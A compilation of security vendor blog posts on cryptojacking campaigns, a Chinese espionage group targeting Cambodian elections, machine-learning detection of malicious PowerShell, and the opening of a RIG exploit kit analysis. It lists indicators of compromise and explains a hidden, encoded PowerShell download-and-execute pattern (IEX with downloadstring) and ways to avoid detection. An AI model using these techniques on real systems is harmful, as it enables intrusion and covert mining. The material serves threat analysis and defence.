FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally

Introduction

FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."


Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.


Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).


Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader

AIRBREAK C2

en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html

TOP_NEWS_Japan_to_Support_the_Election.js

(3c51c89078139337c2c92e084bb0904c) [Figure 4]

chemscalere[.]com

iric.gov.kh/LICADHO/Interview-Questions.pdf

[pdf]Interview-Questions.pdf.js

(e413b45a04bf5f812912772f4a14650f)

iric.gov.kh/LICADHO/Interview-Questions.pdf

[docx]Interview-Questions.docx.js

(cf027a4829c9364d40dcab3f14c1f6b7)

unknown

Interview_Questions.docx.js

(c8fdd2b2ddec970fa69272fdf5ee86cc)

scsnewstoday[.]com

atimes.com/article/philippines-draws-three-hard-new-lines-on-china/

Philippines-draws-three-hard-new-lines-on-china .js

(5d6ad552f1d1b5cfe99ddb0e2bb51fd7)

mlcdailynews[.]com

facebook.com/CNR.Movement/videos/190313618267633/

CNR.Movement.mp4.js

(217d40ccd91160c152e5fce0143b16ef)

Partyforumseasia[.]com

 

Table 1: AIRBREAK downloaders


Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.


Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost

Reuters

U.S. pushes NATO to ready more forces to deter Russian threat

us-nato-russia_us-pushes-nato-to-ready-more-forces-to-deter-russian-threat

Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen

BREAKING NEWS

cambodia-opposition-leader-denied-bail-again-in-treason-case

Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

Malware

Function

Details

EVILTECH

Backdoor

  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.

DADBOD

Credential Theft

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses, 112.66.188.28, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules

Functionality

Decoder

Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.

Tokenizer

Tokenize the PowerShell command into a list of tokens

Stemmer

Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks

Reasoning

The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

